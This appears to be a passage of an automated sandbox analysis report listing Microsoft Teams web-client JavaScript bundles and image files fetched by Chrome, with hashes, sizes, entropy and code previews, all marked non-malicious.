                                                                                                                                                                                                                                                                            SHA-512:1652374979088D5C4CA91D9FDD8893A5FD0EE02CF89A63A2383C6717FC9A2D8FF701F7A71FC4928D6E35BFB05AC9F7FD30618238CC26476993C64EE482A3D0A9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/517259-c27e3a224439a3ec.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[517259],{706201:(e,t,s)=>{s.d(t,{d:()=>i,I:()=>n});class i{constructor(e){this.valueGenerator=e,this._evaluated=!1}get evaluated(){return this._evaluated}get value(){return this._evaluated||(this._evaluated=!0,this._value=this.valueGenerator()),this._value}}class n{get[Symbol.toStringTag](){return"[object LazyPromise]"}constructor(e){this.execute=e}async then(e,t){return this.getPromise().then(...arguments)}async catch(e){return this.getPromise().catch(...arguments)}async finally(e){return this.getPromise().finally(...arguments)}async getPromise(){return void 0===this.result&&(this.result=this.execute()),this.result}}},211834:(e,t,s)=>{s.d(t,{x:()=>i});const i="IFluidDependencySynthesizer"},203716:(e,t,s)=>{s.d(t,{h:()=>r});var i=s(706201),n=s(211834);class r{get IFluidDependencySynthesizer(){return this}constructor(...e){this.providers=new Map,this.parents=e.filter((e=>void
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):97386
                                                                                                                                                                                                                                                                            Entropy (8bit):5.409202916101396
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:AYOFtBcBgh/A3ckqBWqnq/eygnuOXwWQa01bYO1MCt8q:AYOFCf/cq/NRr1MNCtF
                                                                                                                                                                                                                                                                            MD5:DEB6CC65C69E068DFB8E094926954D7F
                                                                                                                                                                                                                                                                            SHA1:1FB93B19BC2FA21B1BF08BE5916FB62D34F3438E
                                                                                                                                                                                                                                                                            SHA-256:C6074B5366BBDEC84AAF41BC66C753A96F3850C5A9E3F8974073B32F2956CEE8
                                                                                                                                                                                                                                                                            SHA-512:54DB639E45E7904BD9C3C36ED8C555FEBFD5CA1C8381E61056BE75B4138A6638B1120C031FFBCEF6D316C5150E47796A76B082D48E7D57237A10F69D11917D50
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/747607-e867fd4c0b2c8d0f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[747607],{872994:(n,t,e)=>{e.d(t,{_:()=>H});var r=e(340415),i=e(344411),u=e(759377),o=e(179233),a=e(680828),c=e(260026),f=e(215729),l=e(490507),s=e(722990),v=e(268288),d=e(498863),g=e(661187),h=e(952741),y=e(246904),p=e(483152),m=e(679080),b=e(779497),I=e(287856);var S,w=function(n){function t(){var e,r,u=n.call(this)||this;function a(){e=0,r=[]}return u.identifier="TelemetryInitializerPlugin",u.priority=199,a(),(0,i.A)(t,u,(function(n,t){n.addTelemetryInitializer=function(n){return function(n,t,e){var r={id:t,fn:e};return(0,o.Yny)(n,r),{remove:function(){(0,o.Iuo)(n,(function(t,e){if(t.id===r.id)return n[c.Ic](e,1),-1}))}}}(r,e++,n)},n[y.qT]=function(t,e){(function(n,t,e){for(var r=!1,i=n[c.oI],u=0;u<i;++u){var a=n[u];if(a)try{if(!1===a.fn[c.y9](null,[t])){r=!0;break}}catch(n){(0,g.ZP)(e,2,64,"Telemetry initializer failed: "+(0,h.lL)(n),{exception:(0,o.mmD)(n)},!0)}}return!r}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:PNG image data, 22 x 13, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                                                            Entropy (8bit):4.022997040570905
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPlrytntHp/1xl/k4E08up:6v/lhP0ttJ/17Tp
                                                                                                                                                                                                                                                                            MD5:0CA03005E9A93237B42EFFE101812AE8
                                                                                                                                                                                                                                                                            SHA1:B2B45EB134B9CE362C303E311FBAA16A1A9D5109
                                                                                                                                                                                                                                                                            SHA-256:C43D09024784097C74BEA1E895D2DE28E73B05F6804C38BFB72A5A12D4391B76
                                                                                                                                                                                                                                                                            SHA-512:53699D6F19FAE1B962194D642F3190A776D6A896B56F37F6C38CBC9B3D966A00C2ABA37070AC6D116E9E7EA8016037B68CD49005A2A5D2A32A35C0BC87DDE739
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:.PNG........IHDR............."..4....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (44425)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):44533
                                                                                                                                                                                                                                                                            Entropy (8bit):5.270142196256675
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:3jOT4igirpMPTfKC3hVf2prHPPjzJkGmdTgAWbh/kBmhwkBBkXboeb8hIqHGi8Kd:5CCfq1m6Qb+mi8Fvw+CO50SfcJ5Y8
                                                                                                                                                                                                                                                                            MD5:B7289244C39667518303834AF67B17F2
                                                                                                                                                                                                                                                                            SHA1:A08B19A0A3EB54A16976EC1A606504130ABBB467
                                                                                                                                                                                                                                                                            SHA-256:D85996B603536F1616663A2D7077C2EAD6EA2F7BCC5108AA4C29051A52B57A68
                                                                                                                                                                                                                                                                            SHA-512:7940135EF7D4DE0F1F38E7468413E1D4FA97C5B89AA1E91198BA8B4D1F3B91D366E3A2080ED008B2C587D57D7CA99CCECEF6C6375F3300373CD493499E63F5C9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/381452-be282a834691e600.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[381452],{95110:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,o=new Array(t);n<t;n++)o[n]=e[n];return o},e.exports.__esModule=!0,e.exports.default=e.exports},952002:(e,t,n)=>{var o=n(95110);e.exports=function(e){if(Array.isArray(e))return o(e)},e.exports.__esModule=!0,e.exports.default=e.exports},119666:(e,t,n)=>{"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{A:()=>o})},63428:(e,t,n)=>{"use strict";function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function i(e,t,n){return t&&o(e.prototype,t),n&&o(e,n),Object.defineProperty(e,"prototype",{writable:!1}),e}n.d(t,{A:()=>i})},426220:(e,t,n)=>{"use strict";function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 18 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):172066
                                                                                                                                                                                                                                                                            Entropy (8bit):4.32521391566617
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:Dg7Z3gHhMIW7F3TGUhxkZ1OgbC6kStqJ1L3mC3g9BQ0MRB3R9HwXOeOkccOOOOJW:07Z32hLWNTJhxiQACPStqzZw9ep3RV
                                                                                                                                                                                                                                                                            MD5:247D14144A313421D8D84AA0EA54D249
                                                                                                                                                                                                                                                                            SHA1:83BEFDD6EBA57FAA3D3074AA08A28A4E8D75076A
                                                                                                                                                                                                                                                                            SHA-256:2D5AA67B8ACE13A94FD09316787E3C9ABA2ADAC767B6E2AB769A2265A2AD20F0
                                                                                                                                                                                                                                                                            SHA-512:F2D79A2A75148EFAF90A4A92980E781B1F94A4A1034383FFE5749983085EF7EAFA29D4804094296B212795501B4B4A126BC47C24A91B60C24104BC4B24D99565
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/evergreen-assets/icons/microsoft_teams_logo_refresh.ico
                                                                                                                                                                                                                                                                            Preview:...... ..........&...........(.......@@......(...6...00..........^... ...........*..........h....2........ .$5...8..``.... .....:m..PP.... ..g......HH.... ..T...i..@@.... .(B..R...<<.... .H:..z...00.... ..%...:..((.... .h...j`.. .... ......z........ .....z......... ............... .h.......(... ...@....................................................................................................................................................................................................................................DDD|...||x...||||||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L........|.....|@.............L...||x..|||||||H..................|||.............................||x..........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32722)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):32830
                                                                                                                                                                                                                                                                            Entropy (8bit):5.434900034228035
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:RdSxMwawUxjFewyBUwr0J51UEMGl3FMUs4Rwxx7dLHL5U+4uW1y5olaXy+QwkwAj:97y/0VUEMzBR45G51Qwkwt+g1Se3Ls7x
                                                                                                                                                                                                                                                                            MD5:D0AF1B099077004743FA6FC83B023DEC
                                                                                                                                                                                                                                                                            SHA1:EF9F49B8E410322B481793EA5C76AE9F5616E633
                                                                                                                                                                                                                                                                            SHA-256:36834979F247CB16C0A1FFE50C8BFA2C3462CABA6C2A0982C1E337BAEBF51150
                                                                                                                                                                                                                                                                            SHA-512:35835B7E937D286CA0F110D9A2C1E0ACA1E36ACCB4570B7D27AB5D8DC0A46C833AB0F701CB9A5102B7610AFD830818563DA9833B0A1DC47D47743961DD2D8A99
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[856736],{670262:(e,t,n)=>{n.d(t,{D:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppButtonQuery($appId:ID!) {appButtonResult(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},845857:(e,t,n)=>{n.d(t,{$:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusEnterQuery($appId:ID!) {focusEnterHandlerState(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},298416:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusRegisterQuery($appId:ID!) {registerFocusEnterHandlerState(appId:$appId) @client {appId,isRegistered}}");return delete this.definitions,this.definitions=e.defini
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (28816)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):28923
                                                                                                                                                                                                                                                                            Entropy (8bit):5.333485791515068
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:QyMDkxfYbxQMlxIpxvWxgGUFW+DUa5VmoHkv2S2JDBxI5Qy8/gTbocPoQDcf9M:LgkalIpYxgWcB4C/gTccPp
                                                                                                                                                                                                                                                                            MD5:BA4B4438C9D00B3A7D9F98503619A826
                                                                                                                                                                                                                                                                            SHA1:97340947E543E5E8FF3CA93B563FD97F42C73111
                                                                                                                                                                                                                                                                            SHA-256:33A2DF3C4718E760FFF787A29B49C7A5792BC84D94DE1981ED6D14B142FDBFDA
                                                                                                                                                                                                                                                                            SHA-512:049813B3D700FCD91A7343FACAC627AE778DF05E5F834E2B4CF8A595EDA0C34FD8901C08DDD57B464C929BFD293E35350F91B235883A07ACBC13E0AAAA78F2F3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/95061-039f5446612a3aa5.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[95061],{598166:(t,e,n)=>{"use strict";function r(t){return t.split("-")[1]}function i(t){return"y"===t?"height":"width"}function o(t){return t.split("-")[0]}function a(t){return["top","bottom"].includes(o(t))?"x":"y"}function s(t,e,n){let{reference:s,floating:l}=t;const c=s.x+s.width/2-l.width/2,f=s.y+s.height/2-l.height/2,u=a(e),d=i(u),p=s[d]/2-l[d]/2,h="x"===u;let g;switch(o(e)){case"top":g={x:c,y:s.y-l.height};break;case"bottom":g={x:c,y:s.y+s.height};break;case"right":g={x:s.x+s.width,y:f};break;case"left":g={x:s.x-l.width,y:f};break;default:g={x:s.x,y:s.y}}switch(r(e)){case"start":g[u]-=p*(n&&h?-1:1);break;case"end":g[u]+=p*(n&&h?-1:1)}return g}n.d(e,{UE:()=>g,rD:()=>l,__:()=>u,UU:()=>b,jD:()=>I,ER:()=>L,cY:()=>E,B1:()=>f,BN:()=>k,Ej:()=>B});const l=async(t,e,n)=>{const{placement:r="bottom",strategy:i="absolute",middleware:o=[],platform:a}=n,l=o.filter(Boolean),c=await(null==a.isRTL?
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1179)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1287
                                                                                                                                                                                                                                                                            Entropy (8bit):5.226870802404122
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38nmCamm7wybSHIoWLTMz0r1eTM9oWoWOuTf+Udtk7Sz+KIJYbOc:wp3sp3j/VTMzBAfrf+wtXz1IOZ
                                                                                                                                                                                                                                                                            MD5:B6D1A6A743B008B467C2395A4485F390
                                                                                                                                                                                                                                                                            SHA1:899A6E8EE6B23EE0E49F0B89C33ED5CB4B722226
                                                                                                                                                                                                                                                                            SHA-256:F1F36623804CDDD4D5A0FB0FD6C3C30E45FE86DBE5D7C2FAE78298F8E7545A36
                                                                                                                                                                                                                                                                            SHA-512:49AEF8E6862D335E794C13A91651A3DE375B3A1AAD5604B73D015657DE39104D86C1283F5347B1D92C733449F53AC0DBF001A98DEE2C8C157EF793EF7EC01063
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[120951],{120951:(e,a,t)=>{t.d(a,{D:()=>i});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),r=t(829289),i=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},s.createElement("path",{className:n()(r.Q.outline,a.outlinePart),d:"M15.8527 7.64582C16.0484 7.84073 16.0489 8.15731 15.854 8.35292L10.389 13.8374C10.1741 14.0531 9.82477 14.0531 9.60982 13.8374L4.14484 8.35292C3.94993 8.15731 3.95049 7.84073 4.1461 7.64582C4.34171 7.4509 4.65829 7.45147 4.85321 7.64708L9.99942 12.8117L15.1456 7.64708C15.3406 7.45147 15.6571 7.4509 15.8527 7.64582Z"}),s.createElement("path",{className:n()(r.Q.filled,a.filledPart),d:"M15.793 7.73271C16.0787 8.03263 16.0672 8.50737 15.7672 8.79306L10.5168 13.7944C10.2271 14.0703 9.77187 14.0703 9.4822 13.7944L4.23173 8.79306C3.93181 8.50737 3.92028 8.03263 4.2059
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61423)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):61529
                                                                                                                                                                                                                                                                            Entropy (8bit):5.454599062626855
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:J8D47fVcFkRgOtD5Pjh3qExlWu8ioo/MI7wufTgthcPgLe49EnK/EnNckeLEp7OB:J8afVRgOtD5PjK/6UvsDNhdc
                                                                                                                                                                                                                                                                            MD5:2C88D627F2227B847B39CF3AEAAB764B
                                                                                                                                                                                                                                                                            SHA1:07EBE3F9EFA0EDDE0636C87145435823CF7D2D92
                                                                                                                                                                                                                                                                            SHA-256:BD6AE54FCAFB683F37420DA8D9FC2FB47B49C362E2CA1E1BED3FDD58CB4E9C53
                                                                                                                                                                                                                                                                            SHA-512:204089BB8FC57537EE32F368220D7A828D2502C196BA656411EA0CCFC6FF3305E2A20B2A9BAFA5146DF636E5978A282A0B10FC2A93BEF23D0F776F132FE41550
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[2754],{719156:e=>{var t;!function(e){!function(e){!function(e){e[e.None=0]="None",e[e.Notified=1]="Notified",e[e.Connecting=2]="Connecting",e[e.Connected=3]="Connected",e[e.LocalHold=4]="LocalHold",e[e.RemoteHold=5]="RemoteHold",e[e.Disconnecting=6]="Disconnecting",e[e.Disconnected=7]="Disconnected",e[e.Observing=8]="Observing",e[e.EarlyMedia=9]="EarlyMedia",e[e.InLobby=10]="InLobby",e[e.Preheating=11]="Preheating",e[e.Preheated=12]="Preheated",e[e.Staging=13]="Staging",e[e.NegotiatingEncryption=14]="NegotiatingEncryption",e[e.NegotiatingEncryptionLobby=15]="NegotiatingEncryptionLobby"}(e.CallState||(e.CallState={})),function(e){e[e.Testing=0]="Testing",e[e.MicrosoftWNS=1]="MicrosoftWNS",e[e.MicrosoftWP7NS=2]="MicrosoftWP7NS",e[e.AppleAPN=3]="AppleAPN",e[e.GoogleAGCM=4]="GoogleAGCM",e[e.Hotmail=5]="Hotmail",e[e.GoogleAC2DM=6]="GoogleAC2DM",e[e.Trouter=7]="Trouter",e[e.Griffin=8]="Griffin"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22637)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):22745
                                                                                                                                                                                                                                                                            Entropy (8bit):5.323982641842712
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:gxOaUKs4Lk5+4K+oaNlZFe2JgAf4MsehMINWsIpCeG:gxOaG4oNFJgA1skXb
                                                                                                                                                                                                                                                                            MD5:B09B077BA8260002A8EADCD5EB4708B1
                                                                                                                                                                                                                                                                            SHA1:506936BA470B4ADBBC2D737500DCA02496535545
                                                                                                                                                                                                                                                                            SHA-256:377E85D7D26E4F888ECC278631C3362545B51A397CE6E74AAB3F1418DF5F8F7A
                                                                                                                                                                                                                                                                            SHA-512:8E98EB4E1DA92332ABDB9ACBA83B1BF8347080B2C1236300081DB71404599D684A9724FEFCF714A121EBBC82D415E308152E34410791C2D38C4CD52A61D85732
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725973],{165451:(e,n,t)=>{t.d(n,{Q:()=>o});var r=t(240364),o=function(e){var n=(0,r.b)(Object.assign({},e,{vertical:!0}));return Object.assign({},n,{attributes:Object.assign({},n.attributes,{root:Object.assign({},n.attributes.root,{disabled:e.disabled,"aria-disabled":e.disabledFocusable})})})}},31007:(e,n,t)=>{t.d(n,{f:()=>C,K:()=>N});var r=t(112882),o=t.n(r),a=t(504405),s=t(382883),i=t(996665),l=t(301078),u=t(390956),c=t(31828),p=t(628266),d=t(152450),m=t(121121),f=t(62600),b=t(513432),v=t(382462),y=t(655008),g=t(278459),C="ui-toolbar__customitem",N=function(){var e=(0,s.A)((function(e,n,t){var r,s=(0,i.P3)(),f=(0,l.J)(t.displayName,s.telemetry),y=f.setStart,C=f.setEnd;y();var N=e.accessibility,P=e.children,h=e.className,k=e.content,I=e.design,O=e.fitted,S=e.focusable,T=e.styles,_=e.variables,w=b.useContext(g.g),E=(0,u.W)(N,{debugName:t.displayName,rtl:s.rtl}),F=(0,c.I)(t.di
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (25884)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):25992
                                                                                                                                                                                                                                                                            Entropy (8bit):5.277039269803265
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:vdt+mv1OEw2byKlzm5vZvY9qk8ESiFsvYSICUdn4SPFH:jO+eKR
                                                                                                                                                                                                                                                                            MD5:6E821E654350985785C0243CC4D32584
                                                                                                                                                                                                                                                                            SHA1:C46D939CE912758DBFF0E9066F4138DBF6DF2764
                                                                                                                                                                                                                                                                            SHA-256:2643ACE4FBDF1B99DDAAAD0EB0C4ED4DB1BC2E90D09F0427763814BB4FFA312C
                                                                                                                                                                                                                                                                            SHA-512:D866EB71CB1FE03EF605C84E84D94E46AA99C7602C1A69B6A5BFD37BEC977FF67E4D386F83C828C759381715BA4F84B14EAD22A5E5CDEE64D6BE2A05712A02F0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[487132],{825268:(e,t,o)=>{o.d(t,{_:()=>s});var i=o(362328);const n={kind:"Document",get definitions(){const e=(0,i.G)("fragment emoticonCategoryFragments on EmoticonCategory {id,title,description,count}");return delete this.definitions,this.definitions=e.definitions}},s={kind:"Document",get definitions(){const e=(0,i.G)("query emoticonCategories($includeRecentCategory:Boolean!) {emoticonCategories(includeRecentCategory:$includeRecentCategory) {...emoticonCategoryFragments}}");return delete this.definitions,this.definitions=[...e.definitions,...n.definitions]}}},487132:(e,t,o)=>{o.d(t,{p5:()=>U,xD:()=>A,t3:()=>P,BI:()=>q,UI:()=>L,eQ:()=>N,BW:()=>B,gE:()=>x,gj:()=>F,Z4:()=>$,ss:()=>R,R4:()=>b,KM:()=>_});var i=o(364819),n=o(332752),s=o(127066),r=o(757060),a=o(483330),c=o(997469),d=o(433245),m=o(751067),l=o(425169),h=o(8607),u=o(573990),g=o(956400),f=o(236347),y=o(362328);const p
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1103641
                                                                                                                                                                                                                                                                            Entropy (8bit):5.414214427513954
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:NDCLrQ4hYANZEwdT0FNm9/ECzZfHE110GgNPENBDl9xdzuMlW951c:cT9cCzM0GgNPENBDl/kbK
                                                                                                                                                                                                                                                                            MD5:194338E660C8E67A9C6E9A0F7919808F
                                                                                                                                                                                                                                                                            SHA1:6D3913E150505AB9AFE49B27218CA440B2C8941B
                                                                                                                                                                                                                                                                            SHA-256:8B9CA722D58B4602DAF336E06628316AF8457A989D83515FB4B696FFF5803EF0
                                                                                                                                                                                                                                                                            SHA-512:C783FFE4267ED436358CD01014CED3B2D3F9B4CA4E8A3D1BCC4F5D1F511D9434FE4A9C74D9842095E3D48D61FF0FCFA33D8B6235D740A8C648D96E1E485C248E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/config-prod-490f411d93845169.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[426009],{937148:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={configs:{auth:{enableAuthV2:[{value:!0}],enableMsal2:[{platform:[1454,1415],value:!0},{value:!0,platform:[1454,1415]}],caeEnabledResources:[{value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://outlook.office.com","https://ic3.teams.office.com","sharepoint","presence"]}],criticalResources:[{platform:[50,51,49],value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://ic3-non-cae.teams.office.com","https://ic3.teams.office.com","https://outlook.office.com/search","https://presence.teams.microsoft.com/","https://noam.presence.teams.microsoft.com/","https://emea.presence.teams.microsoft.com/","https://apac.presence.teams.microsoft.com/","https://presence.gcc.teams.microsoft.com/","https://noamdf.presence.teams.microsoft.com/"]},{value:["https://api.sp
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):75662
                                                                                                                                                                                                                                                                            Entropy (8bit):5.462624435812403
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:dIgGLV8OiyPwDCT+frbqKHDxrogYheDtiLDS/bz1u:dLhOuy+fvqKHDJFtiqu
                                                                                                                                                                                                                                                                            MD5:6534E12740B5779AEFCC2D13470908FE
                                                                                                                                                                                                                                                                            SHA1:82D3EAD08E21724B1C2EDFF43D86CEBBD0D96AB5
                                                                                                                                                                                                                                                                            SHA-256:0723C2AC6263087ADBF214A6C2131DD6F42418C40524189BD80183D09692D7D6
                                                                                                                                                                                                                                                                            SHA-512:842F15B58D931B34AD0EE2BB2D46B1679DEF13F963362B44016100A7547FC3FFD17A3C9C4A67A573961544D959C7136721AC03A39BF481DB95A28639C8706A6B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/653800-5c79288d53c4e888.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[653800],{600093:(e,t,n)=>{var a,i;n.d(t,{d:()=>a,J:()=>i}),function(e){e.HighMemoryUsage="HighMemoryUsage",e.CallingStackInitTimeoutOrFailure="CallingStackInitTimeoutOrFailure",e.GroupCallTimeoutOrFailure="GroupCallTimeoutOrFailure"}(a||(a={})),function(e){e.MeetingsAudio="1",e.MeetingsVideoOrScreenSharing="2",e.CallingCallDrops="3",e.MessagingOther="5",e.ActivityFeed="6",e.Crashing="7",e.Files="8",e.SearchSERPSearchResultsPage="9",e.SearchPowerbarAutosuggest="10",e.Other="11",e.MeetingsLiveCaptionsOrTranscript="14",e.TeamsChannelsMembership="15",e.Accessibility="17",e.Calendar="18",e.MeetingsOther="19",e.PlatformApps="20",e.PlatformBotsConnectors="21",e.PlatformTabs="22",e.TeamsChannelsCreateManageSettings="23",e.MessagingSync="25",e.PeopleProfiles="26",e.StatusPresence="27",e.TeamsChannelsPrivateAndSharedChannels="28",e.LocalizationTranslation="29",e.MeetingsAgendaNotes="30
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):278112
                                                                                                                                                                                                                                                                            Entropy (8bit):5.258465747930893
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:VCVVfQAAHltrSatKyTmGYO1+7EfV1dIsAHx6Q:cClACKAmS1+7EfV127x6Q
                                                                                                                                                                                                                                                                            MD5:59BFD4B0C4931E92C9D952C8AF3B95C2
                                                                                                                                                                                                                                                                            SHA1:7310301170EF288D8CD8DB205A56B82485602236
                                                                                                                                                                                                                                                                            SHA-256:16C54E4CBD1EAAFA4B09F84D93659671507CEDADC2BF8B5776E2822EB2D7E332
                                                                                                                                                                                                                                                                            SHA-512:9EC6D3D36AD32BA1B86CA093C6991EEBED93DFB5D77728DDD9B186C03205C4F721719EB16D69B4334455718AA7C8FACCEE49CE87680E8704FD1A36C624E36609
                                                                                                                                                                                                                                                                            Malicious:false
